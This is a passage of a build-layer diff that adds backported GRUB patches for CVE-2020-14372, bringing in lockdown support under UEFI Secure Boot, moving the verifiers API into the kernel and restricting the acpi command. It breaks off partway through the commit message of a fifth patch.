25 grub-core/commands/acpi.c | 15 ++++++++-------
26 2 files changed, 13 insertions(+), 7 deletions(-)
27
28diff --git a/docs/grub.texi b/docs/grub.texi
29index 0786427..47ac7ff 100644
30--- a/docs/grub.texi
31+++ b/docs/grub.texi
32@@ -3986,6 +3986,11 @@ Normally, this command will replace the Root System Description Pointer
33 (RSDP) in the Extended BIOS Data Area to point to the new tables. If the
34 @option{--no-ebda} option is used, the new tables will be known only to
35 GRUB, but may be used by GRUB's EFI emulation.
36+
37+Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
38+ Otherwise an attacker can instruct the GRUB to load an SSDT table to
39+ overwrite the kernel lockdown configuration and later load and execute
40+ unsigned code.
41 @end deffn
42
43
44diff --git a/grub-core/commands/acpi.c b/grub-core/commands/acpi.c
45index 5a1499a..1215f2a 100644
46--- a/grub-core/commands/acpi.c
47+++ b/grub-core/commands/acpi.c
48@@ -27,6 +27,7 @@
49 #include <grub/mm.h>
50 #include <grub/memory.h>
51 #include <grub/i18n.h>
52+#include <grub/lockdown.h>
53
54 #ifdef GRUB_MACHINE_EFI
55 #include <grub/efi/efi.h>
56@@ -775,13 +776,13 @@ static grub_extcmd_t cmd;
57
58 GRUB_MOD_INIT(acpi)
59 {
60- cmd = grub_register_extcmd ("acpi", grub_cmd_acpi, 0,
61- N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
62- "--load-only=TABLE1,TABLE2] FILE1"
63- " [FILE2] [...]"),
64- N_("Load host ACPI tables and tables "
65- "specified by arguments."),
66- options);
67+ cmd = grub_register_extcmd_lockdown ("acpi", grub_cmd_acpi, 0,
68+ N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
69+ "--load-only=TABLE1,TABLE2] FILE1"
70+ " [FILE2] [...]"),
71+ N_("Load host ACPI tables and tables "
72+ "specified by arguments."),
73+ options);
74 }
75
76 GRUB_MOD_FINI(acpi)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
new file mode 100644
index 0000000000..745f335501
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
@@ -0,0 +1,130 @@
1From fe7a13df6200bda934fcc0246458df249f1ef4f2 Mon Sep 17 00:00:00 2001
2From: Marco A Benatto <mbenatto@redhat.com>
3Date: Wed, 23 Sep 2020 11:33:33 -0400
4Subject: [PATCH] verifiers: Move verifiers API to kernel image
5
6Move verifiers API from a module to the kernel image, so it can be
7used there as well. There are no functional changes in this patch.
8
9Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
10Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
11Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
12
13Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9e95f45ceeef36fcf93cbfffcf004276883dbc99]
14CVE: CVE-2020-14372
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/Makefile.am | 1 +
18 grub-core/Makefile.core.def | 6 +-----
19 grub-core/kern/main.c | 4 ++++
20 grub-core/{commands => kern}/verifiers.c | 8 ++------
21 include/grub/verify.h | 9 ++++++---
22 5 files changed, 14 insertions(+), 14 deletions(-)
23 rename grub-core/{commands => kern}/verifiers.c (97%)
24
25diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
26index 3ea8e7f..375c30d 100644
27--- a/grub-core/Makefile.am
28+++ b/grub-core/Makefile.am
29@@ -90,6 +90,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/parser.h
30 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/partition.h
31 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/term.h
32 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/time.h
33+KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/verify.h
34 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/mm_private.h
35 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/net.h
36 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/memory.h
37diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
38index 474a63e..cff02f2 100644
39--- a/grub-core/Makefile.core.def
40+++ b/grub-core/Makefile.core.def
41@@ -140,6 +140,7 @@ kernel = {
42 common = kern/rescue_parser.c;
43 common = kern/rescue_reader.c;
44 common = kern/term.c;
45+ common = kern/verifiers.c;
46
47 noemu = kern/compiler-rt.c;
48 noemu = kern/mm.c;
49@@ -942,11 +943,6 @@ module = {
50 cppflags = '-I$(srcdir)/lib/posix_wrap';
51 };
52
53-module = {
54- name = verifiers;
55- common = commands/verifiers.c;
56-};
57-
58 module = {
59 name = shim_lock;
60 common = commands/efi/shim_lock.c;
61diff --git a/grub-core/kern/main.c b/grub-core/kern/main.c
62index 9cad0c4..73967e2 100644
63--- a/grub-core/kern/main.c
64+++ b/grub-core/kern/main.c
65@@ -29,6 +29,7 @@
66 #include <grub/command.h>
67 #include <grub/reader.h>
68 #include <grub/parser.h>
69+#include <grub/verify.h>
70
71 #ifdef GRUB_MACHINE_PCBIOS
72 #include <grub/machine/memory.h>
73@@ -274,6 +275,9 @@ grub_main (void)
74 grub_printf ("Welcome to GRUB!\n\n");
75 grub_setcolorstate (GRUB_TERM_COLOR_STANDARD);
76
77+ /* Init verifiers API. */
78+ grub_verifiers_init ();
79+
80 grub_load_config ();
81
82 grub_boot_time ("Before loading embedded modules.");
83diff --git a/grub-core/commands/verifiers.c b/grub-core/kern/verifiers.c
84similarity index 97%
85rename from grub-core/commands/verifiers.c
86rename to grub-core/kern/verifiers.c
87index 0dde481..aa3dc7c 100644
88--- a/grub-core/commands/verifiers.c
89+++ b/grub-core/kern/verifiers.c
90@@ -217,12 +217,8 @@ grub_verify_string (char *str, enum grub_verify_string_type type)
91 return GRUB_ERR_NONE;
92 }
93
94-GRUB_MOD_INIT(verifiers)
95+void
96+grub_verifiers_init (void)
97 {
98 grub_file_filter_register (GRUB_FILE_FILTER_VERIFY, grub_verifiers_open);
99 }
100-
101-GRUB_MOD_FINI(verifiers)
102-{
103- grub_file_filter_unregister (GRUB_FILE_FILTER_VERIFY);
104-}
105diff --git a/include/grub/verify.h b/include/grub/verify.h
106index ea04914..cd129c3 100644
107--- a/include/grub/verify.h
108+++ b/include/grub/verify.h
109@@ -64,7 +64,10 @@ struct grub_file_verifier
110 grub_err_t (*verify_string) (char *str, enum grub_verify_string_type type);
111 };
112
113-extern struct grub_file_verifier *grub_file_verifiers;
114+extern struct grub_file_verifier *EXPORT_VAR (grub_file_verifiers);
115+
116+extern void
117+grub_verifiers_init (void);
118
119 static inline void
120 grub_verifier_register (struct grub_file_verifier *ver)
121@@ -78,7 +81,7 @@ grub_verifier_unregister (struct grub_file_verifier *ver)
122 grub_list_remove (GRUB_AS_LIST (ver));
123 }
124
125-grub_err_t
126-grub_verify_string (char *str, enum grub_verify_string_type type);
127+extern grub_err_t
128+EXPORT_FUNC (grub_verify_string) (char *str, enum grub_verify_string_type type);
129
130 #endif /* ! GRUB_VERIFY_HEADER */
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
new file mode 100644
index 0000000000..a98b5d0455
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
@@ -0,0 +1,431 @@
1From d8aac4517fef0f0188a60a2a8ff9cafdd9c7ca42 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Mon, 28 Sep 2020 20:08:02 +0200
4Subject: [PATCH] kern: Add lockdown support
5
6When the GRUB starts on a secure boot platform, some commands can be
7used to subvert the protections provided by the verification mechanism and
8could lead to booting untrusted system.
9
10To prevent that situation, allow GRUB to be locked down. That way the code
11may check if GRUB has been locked down and further restrict the commands
12that are registered or what subset of their functionality could be used.
13
14The lockdown support adds the following components:
15
16* The grub_lockdown() function which can be used to lockdown GRUB if,
17 e.g., UEFI Secure Boot is enabled.
18
19* The grub_is_lockdown() function which can be used to check if the GRUB
20 was locked down.
21
22* A verifier that flags OS kernels, the GRUB modules, Device Trees and ACPI
23 tables as GRUB_VERIFY_FLAGS_DEFER_AUTH to defer verification to other
24 verifiers. These files are only successfully verified if another registered
25 verifier returns success. Otherwise, the whole verification process fails.
26
27 For example, PE/COFF binaries verification can be done by the shim_lock
28 verifier which validates the signatures using the shim_lock protocol.
29 However, the verification is not deferred directly to the shim_lock verifier.
30 The shim_lock verifier is hooked into the verification process instead.
31
32* A set of grub_{command,extcmd}_lockdown functions that can be used by
33 code registering command handlers, to only register unsafe commands if
34 the GRUB has not been locked down.
35
36Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
37Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
38
39Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=578c95298bcc46e0296f4c786db64c2ff26ce2cc]
40CVE: CVE-2020-14372
41Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
42---
43 conf/Makefile.common | 2 +
44 docs/grub-dev.texi | 27 +++++++++++++
45 docs/grub.texi | 8 ++++
46 grub-core/Makefile.am | 5 ++-
47 grub-core/Makefile.core.def | 1 +
48 grub-core/commands/extcmd.c | 23 +++++++++++
49 grub-core/kern/command.c | 24 +++++++++++
50 grub-core/kern/lockdown.c | 80 +++++++++++++++++++++++++++++++++++++
51 include/grub/command.h | 5 +++
52 include/grub/extcmd.h | 7 ++++
53 include/grub/lockdown.h | 44 ++++++++++++++++++++
54 11 files changed, 225 insertions(+), 1 deletion(-)
55 create mode 100644 grub-core/kern/lockdown.c
56 create mode 100644 include/grub/lockdown.h
57
58diff --git a/conf/Makefile.common b/conf/Makefile.common
59index 6cd71cb..2a1a886 100644
60--- a/conf/Makefile.common
61+++ b/conf/Makefile.common
62@@ -84,7 +84,9 @@ CPPFLAGS_PARTTOOL_LIST = -Dgrub_parttool_register=PARTTOOL_LIST_MARKER
63 CPPFLAGS_TERMINAL_LIST = '-Dgrub_term_register_input(...)=INPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
64 CPPFLAGS_TERMINAL_LIST += '-Dgrub_term_register_output(...)=OUTPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
65 CPPFLAGS_COMMAND_LIST = '-Dgrub_register_command(...)=COMMAND_LIST_MARKER(__VA_ARGS__)'
66+CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_lockdown(...)=COMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
67 CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd(...)=EXTCOMMAND_LIST_MARKER(__VA_ARGS__)'
68+CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd_lockdown(...)=EXTCOMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
69 CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_p1(...)=P1COMMAND_LIST_MARKER(__VA_ARGS__)'
70 CPPFLAGS_FDT_LIST := '-Dgrub_fdtbus_register(...)=FDT_DRIVER_LIST_MARKER(__VA_ARGS__)'
71 CPPFLAGS_MARKER = $(CPPFLAGS_FS_LIST) $(CPPFLAGS_VIDEO_LIST) \
72diff --git a/docs/grub-dev.texi b/docs/grub-dev.texi
73index ee389fd..635ec72 100644
74--- a/docs/grub-dev.texi
75+++ b/docs/grub-dev.texi
76@@ -86,6 +86,7 @@ This edition documents version @value{VERSION}.
77 * PFF2 Font File Format::
78 * Graphical Menu Software Design::
79 * Verifiers framework::
80+* Lockdown framework::
81 * Copying This Manual:: Copying This Manual
82 * Index::
83 @end menu
84@@ -2086,6 +2087,32 @@ Optionally at the end of the file @samp{fini}, if it exists, is called with just
85 the context. If you return no error during any of @samp{init}, @samp{write} and
86 @samp{fini} then the file is considered as having succeded verification.
87
88+@node Lockdown framework
89+@chapter Lockdown framework
90+
91+The GRUB can be locked down, which is a restricted mode where some operations
92+are not allowed. For instance, some commands cannot be used when the GRUB is
93+locked down.
94+
95+The function
96+@code{grub_lockdown()} is used to lockdown GRUB and the function
97+@code{grub_is_lockdown()} function can be used to check whether lockdown is
98+enabled or not. When enabled, the function returns @samp{GRUB_LOCKDOWN_ENABLED}
99+and @samp{GRUB_LOCKDOWN_DISABLED} when is not enabled.
100+
101+The following functions can be used to register the commands that can only be
102+used when lockdown is disabled:
103+
104+@itemize
105+
106+@item @code{grub_cmd_lockdown()} registers command which should not run when the
107+GRUB is in lockdown mode.
108+
109+@item @code{grub_cmd_lockdown()} registers extended command which should not run
110+when the GRUB is in lockdown mode.
111+
112+@end itemize
113+
114 @node Copying This Manual
115 @appendix Copying This Manual
116
117diff --git a/docs/grub.texi b/docs/grub.texi
118index 8779507..d778bfb 100644
119--- a/docs/grub.texi
120+++ b/docs/grub.texi
121@@ -5581,6 +5581,7 @@ environment variables and commands are listed in the same order.
122 * Using digital signatures:: Booting digitally signed code
123 * UEFI secure boot and shim:: Booting digitally signed PE files
124 * Measured Boot:: Measuring boot components
125+* Lockdown:: Lockdown when booting on a secure setup
126 @end menu
127
128 @node Authentication and authorisation
129@@ -5794,6 +5795,13 @@ into @file{core.img} in order to avoid a potential gap in measurement between
130
131 Measured boot is currently only supported on EFI platforms.
132
133+@node Lockdown
134+@section Lockdown when booting on a secure setup
135+
136+The GRUB can be locked down when booted on a secure boot environment, for example
137+if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
138+be restricted and some operations/commands cannot be executed.
139+
140 @node Platform limitations
141 @chapter Platform limitations
142
143diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
144index 375c30d..3096241 100644
145--- a/grub-core/Makefile.am
146+++ b/grub-core/Makefile.am
147@@ -79,6 +79,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/fs.h
148 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/i18n.h
149 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/kernel.h
150 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/list.h
151+KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/lockdown.h
152 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/misc.h
153 if COND_emu
154 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/compiler-rt-emu.h
155@@ -376,8 +377,10 @@ command.lst: $(MARKER_FILES)
156 b=`basename $$pp .marker`; \
157 sed -n \
158 -e "/EXTCOMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
159+ -e "/EXTCOMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
160 -e "/P1COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
161- -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
162+ -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" \
163+ -e "/COMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
164 done) | sort -u > $@
165 platform_DATA += command.lst
166 CLEANFILES += command.lst
167diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
168index cff02f2..651ea2a 100644
169--- a/grub-core/Makefile.core.def
170+++ b/grub-core/Makefile.core.def
171@@ -204,6 +204,7 @@ kernel = {
172 efi = term/efi/console.c;
173 efi = kern/acpi.c;
174 efi = kern/efi/acpi.c;
175+ efi = kern/lockdown.c;
176 i386_coreboot = kern/i386/pc/acpi.c;
177 i386_multiboot = kern/i386/pc/acpi.c;
178 i386_coreboot = kern/acpi.c;
179diff --git a/grub-core/commands/extcmd.c b/grub-core/commands/extcmd.c
180index 69574e2..90a5ca2 100644
181--- a/grub-core/commands/extcmd.c
182+++ b/grub-core/commands/extcmd.c
183@@ -19,6 +19,7 @@
184
185 #include <grub/mm.h>
186 #include <grub/list.h>
187+#include <grub/lockdown.h>
188 #include <grub/misc.h>
189 #include <grub/extcmd.h>
190 #include <grub/script_sh.h>
191@@ -110,6 +111,28 @@ grub_register_extcmd (const char *name, grub_extcmd_func_t func,
192 summary, description, parser, 1);
193 }
194
195+static grub_err_t
196+grub_extcmd_lockdown (grub_extcmd_context_t ctxt __attribute__ ((unused)),
197+ int argc __attribute__ ((unused)),
198+ char **argv __attribute__ ((unused)))
199+{
200+ return grub_error (GRUB_ERR_ACCESS_DENIED,
201+ N_("%s: the command is not allowed when lockdown is enforced"),
202+ ctxt->extcmd->cmd->name);
203+}
204+
205+grub_extcmd_t
206+grub_register_extcmd_lockdown (const char *name, grub_extcmd_func_t func,
207+ grub_command_flags_t flags, const char *summary,
208+ const char *description,
209+ const struct grub_arg_option *parser)
210+{
211+ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
212+ func = grub_extcmd_lockdown;
213+
214+ return grub_register_extcmd (name, func, flags, summary, description, parser);
215+}
216+
217 void
218 grub_unregister_extcmd (grub_extcmd_t ext)
219 {
220diff --git a/grub-core/kern/command.c b/grub-core/kern/command.c
221index acd7218..4aabcd4 100644
222--- a/grub-core/kern/command.c
223+++ b/grub-core/kern/command.c
224@@ -17,6 +17,7 @@
225 * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
226 */
227
228+#include <grub/lockdown.h>
229 #include <grub/mm.h>
230 #include <grub/command.h>
231
232@@ -77,6 +78,29 @@ grub_register_command_prio (const char *name,
233 return cmd;
234 }
235
236+static grub_err_t
237+grub_cmd_lockdown (grub_command_t cmd __attribute__ ((unused)),
238+ int argc __attribute__ ((unused)),
239+ char **argv __attribute__ ((unused)))
240+
241+{
242+ return grub_error (GRUB_ERR_ACCESS_DENIED,
243+ N_("%s: the command is not allowed when lockdown is enforced"),
244+ cmd->name);
245+}
246+
247+grub_command_t
248+grub_register_command_lockdown (const char *name,
249+ grub_command_func_t func,
250+ const char *summary,
251+ const char *description)
252+{
253+ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
254+ func = grub_cmd_lockdown;
255+
256+ return grub_register_command_prio (name, func, summary, description, 0);
257+}
258+
259 void
260 grub_unregister_command (grub_command_t cmd)
261 {
262diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
263new file mode 100644
264index 0000000..1e56c0b
265--- /dev/null
266+++ b/grub-core/kern/lockdown.c
267@@ -0,0 +1,80 @@
268+/*
269+ * GRUB -- GRand Unified Bootloader
270+ * Copyright (C) 2020 Free Software Foundation, Inc.
271+ *
272+ * GRUB is free software: you can redistribute it and/or modify
273+ * it under the terms of the GNU General Public License as published by
274+ * the Free Software Foundation, either version 3 of the License, or
275+ * (at your option) any later version.
276+ *
277+ * GRUB is distributed in the hope that it will be useful,
278+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
279+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
280+ * GNU General Public License for more details.
281+ *
282+ * You should have received a copy of the GNU General Public License
283+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
284+ *
285+ */
286+
287+#include <grub/dl.h>
288+#include <grub/file.h>
289+#include <grub/lockdown.h>
290+#include <grub/verify.h>
291+
292+static int lockdown = GRUB_LOCKDOWN_DISABLED;
293+
294+static grub_err_t
295+lockdown_verifier_init (grub_file_t io __attribute__ ((unused)),
296+ enum grub_file_type type,
297+ void **context __attribute__ ((unused)),
298+ enum grub_verify_flags *flags)
299+{
300+ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
301+
302+ switch (type & GRUB_FILE_TYPE_MASK)
303+ {
304+ case GRUB_FILE_TYPE_GRUB_MODULE:
305+ case GRUB_FILE_TYPE_LINUX_KERNEL:
306+ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
307+ case GRUB_FILE_TYPE_XEN_HYPERVISOR:
308+ case GRUB_FILE_TYPE_BSD_KERNEL:
309+ case GRUB_FILE_TYPE_XNU_KERNEL:
310+ case GRUB_FILE_TYPE_PLAN9_KERNEL:
311+ case GRUB_FILE_TYPE_NTLDR:
312+ case GRUB_FILE_TYPE_TRUECRYPT:
313+ case GRUB_FILE_TYPE_FREEDOS:
314+ case GRUB_FILE_TYPE_PXECHAINLOADER:
315+ case GRUB_FILE_TYPE_PCCHAINLOADER:
316+ case GRUB_FILE_TYPE_COREBOOT_CHAINLOADER:
317+ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
318+ case GRUB_FILE_TYPE_ACPI_TABLE:
319+ case GRUB_FILE_TYPE_DEVICE_TREE_IMAGE:
320+ *flags = GRUB_VERIFY_FLAGS_DEFER_AUTH;
321+
322+ /* Fall through. */
323+
324+ default:
325+ return GRUB_ERR_NONE;
326+ }
327+}
328+
329+struct grub_file_verifier lockdown_verifier =
330+ {
331+ .name = "lockdown_verifier",
332+ .init = lockdown_verifier_init,
333+ };
334+
335+void
336+grub_lockdown (void)
337+{
338+ lockdown = GRUB_LOCKDOWN_ENABLED;
339+
340+ grub_verifier_register (&lockdown_verifier);
341+}
342+
343+int
344+grub_is_lockdown (void)
345+{
346+ return lockdown;
347+}
348diff --git a/include/grub/command.h b/include/grub/command.h
349index eee4e84..2a6f7f8 100644
350--- a/include/grub/command.h
351+++ b/include/grub/command.h
352@@ -86,6 +86,11 @@ EXPORT_FUNC(grub_register_command_prio) (const char *name,
353 const char *summary,
354 const char *description,
355 int prio);
356+grub_command_t
357+EXPORT_FUNC(grub_register_command_lockdown) (const char *name,
358+ grub_command_func_t func,
359+ const char *summary,
360+ const char *description);
361 void EXPORT_FUNC(grub_unregister_command) (grub_command_t cmd);
362
363 static inline grub_command_t
364diff --git a/include/grub/extcmd.h b/include/grub/extcmd.h
365index 19fe592..fe9248b 100644
366--- a/include/grub/extcmd.h
367+++ b/include/grub/extcmd.h
368@@ -62,6 +62,13 @@ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd) (const char *name,
369 const char *description,
370 const struct grub_arg_option *parser);
371
372+grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_lockdown) (const char *name,
373+ grub_extcmd_func_t func,
374+ grub_command_flags_t flags,
375+ const char *summary,
376+ const char *description,
377+ const struct grub_arg_option *parser);
378+
379 grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_prio) (const char *name,
380 grub_extcmd_func_t func,
381 grub_command_flags_t flags,
382diff --git a/include/grub/lockdown.h b/include/grub/lockdown.h
383new file mode 100644
384index 0000000..40531fa
385--- /dev/null
386+++ b/include/grub/lockdown.h
387@@ -0,0 +1,44 @@
388+/*
389+ * GRUB -- GRand Unified Bootloader
390+ * Copyright (C) 2020 Free Software Foundation, Inc.
391+ *
392+ * GRUB is free software: you can redistribute it and/or modify
393+ * it under the terms of the GNU General Public License as published by
394+ * the Free Software Foundation, either version 3 of the License, or
395+ * (at your option) any later version.
396+ *
397+ * GRUB is distributed in the hope that it will be useful,
398+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
399+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
400+ * GNU General Public License for more details.
401+ *
402+ * You should have received a copy of the GNU General Public License
403+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
404+ */
405+
406+#ifndef GRUB_LOCKDOWN_H
407+#define GRUB_LOCKDOWN_H 1
408+
409+#include <grub/symbol.h>
410+
411+#define GRUB_LOCKDOWN_DISABLED 0
412+#define GRUB_LOCKDOWN_ENABLED 1
413+
414+#ifdef GRUB_MACHINE_EFI
415+extern void
416+EXPORT_FUNC (grub_lockdown) (void);
417+extern int
418+EXPORT_FUNC (grub_is_lockdown) (void);
419+#else
420+static inline void
421+grub_lockdown (void)
422+{
423+}
424+
425+static inline int
426+grub_is_lockdown (void)
427+{
428+ return GRUB_LOCKDOWN_DISABLED;
429+}
430+#endif
431+#endif /* ! GRUB_LOCKDOWN_H */
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
new file mode 100644
index 0000000000..93fdd2cb1a
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
@@ -0,0 +1,57 @@
1From bfb9c44298aa202c176fef8dc5ea48f9b0e76e5e Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Tue, 2 Feb 2021 19:59:48 +0100
4Subject: [PATCH] kern/lockdown: Set a variable if the GRUB is locked down
5
6It may be useful for scripts to determine whether the GRUB is locked
7down or not. Add the lockdown variable which is set to "y" when the GRUB
8is locked down.
9
10Suggested-by: Dimitri John Ledkov <xnox@ubuntu.com>
11Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
12Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
13
14Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d90367471779c240e002e62edfb6b31fc85b4908]
15CVE: CVE-2020-14372
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 docs/grub.texi | 3 +++
19 grub-core/kern/lockdown.c | 4 ++++
20 2 files changed, 7 insertions(+)
21
22diff --git a/docs/grub.texi b/docs/grub.texi
23index d778bfb..5e6cace 100644
24--- a/docs/grub.texi
25+++ b/docs/grub.texi
26@@ -5802,6 +5802,9 @@ The GRUB can be locked down when booted on a secure boot environment, for exampl
27 if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
28 be restricted and some operations/commands cannot be executed.
29
30+The @samp{lockdown} variable is set to @samp{y} when the GRUB is locked down.
31+Otherwise it does not exit.
32+
33 @node Platform limitations
34 @chapter Platform limitations
35
36diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
37index 1e56c0b..0bc70fd 100644
38--- a/grub-core/kern/lockdown.c
39+++ b/grub-core/kern/lockdown.c
40@@ -18,6 +18,7 @@
41 */
42
43 #include <grub/dl.h>
44+#include <grub/env.h>
45 #include <grub/file.h>
46 #include <grub/lockdown.h>
47 #include <grub/verify.h>
48@@ -71,6 +72,9 @@ grub_lockdown (void)
49 lockdown = GRUB_LOCKDOWN_ENABLED;
50
51 grub_verifier_register (&lockdown_verifier);
52+
53+ grub_env_set ("lockdown", "y");
54+ grub_env_export ("lockdown");
55 }
56
57 int
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
new file mode 100644
index 0000000000..ac509b63c7
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
@@ -0,0 +1,52 @@
1From 0d809c0979ced9db4d0e500b3e812bba95e52972 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Mon, 28 Sep 2020 20:08:29 +0200
4Subject: [PATCH] efi: Lockdown the GRUB when the UEFI Secure Boot is enabled
5
6If the UEFI Secure Boot is enabled then the GRUB must be locked down
7to prevent executing code that can potentially be used to subvert its
8verification mechanisms.
9
10Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
11Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
12
13Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=98b00a403cbf2ba6833d1ac0499871b27a08eb77]
14CVE: CVE-2020-14372
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/kern/efi/init.c | 15 +++++++++++++++
18 1 file changed, 15 insertions(+)
19
20diff --git a/grub-core/kern/efi/init.c b/grub-core/kern/efi/init.c
21index 3dfdf2d..db84d82 100644
22--- a/grub-core/kern/efi/init.c
23+++ b/grub-core/kern/efi/init.c
24@@ -20,6 +20,7 @@
25 #include <grub/efi/efi.h>
26 #include <grub/efi/console.h>
27 #include <grub/efi/disk.h>
28+#include <grub/lockdown.h>
29 #include <grub/term.h>
30 #include <grub/misc.h>
31 #include <grub/env.h>
32@@ -39,6 +40,20 @@ grub_efi_init (void)
33 /* Initialize the memory management system. */
34 grub_efi_mm_init ();
35
36+ /*
37+ * Lockdown the GRUB and register the shim_lock verifier
38+ * if the UEFI Secure Boot is enabled.
39+ */
40+ if (grub_efi_secure_boot ())
41+ {
42+ grub_lockdown ();
43+ /* NOTE: Our version does not have the shim_lock_verifier,
44+ * need to update below if added */
45+#if 0
46+ grub_shim_lock_verifier_setup ();
47+#endif
48+ }
49+
50 efi_call_4 (grub_efi_system_table->boot_services->set_watchdog_timer,
51 0, 0, 0, NULL);
52
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
new file mode 100644
index 0000000000..12ec4e1c17
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
@@ -0,0 +1,158 @@
1From 1ad728b08ba2a21573e5f81a565114f74ca33988 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Mon, 28 Sep 2020 20:08:33 +0200
4Subject: [PATCH] efi: Use grub_is_lockdown() instead of hardcoding a disabled
5 modules list
6
7Now the GRUB can check if it has been locked down and this can be used to
8prevent executing commands that can be utilized to circumvent the UEFI
9Secure Boot mechanisms. So, instead of hardcoding a list of modules that
10have to be disabled, prevent the usage of commands that can be dangerous.
11
12This not only allows the commands to be disabled on other platforms, but
13also properly separate the concerns. Since the shim_lock verifier logic
14should be only about preventing to run untrusted binaries and not about
15defining these kind of policies.
16
17Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
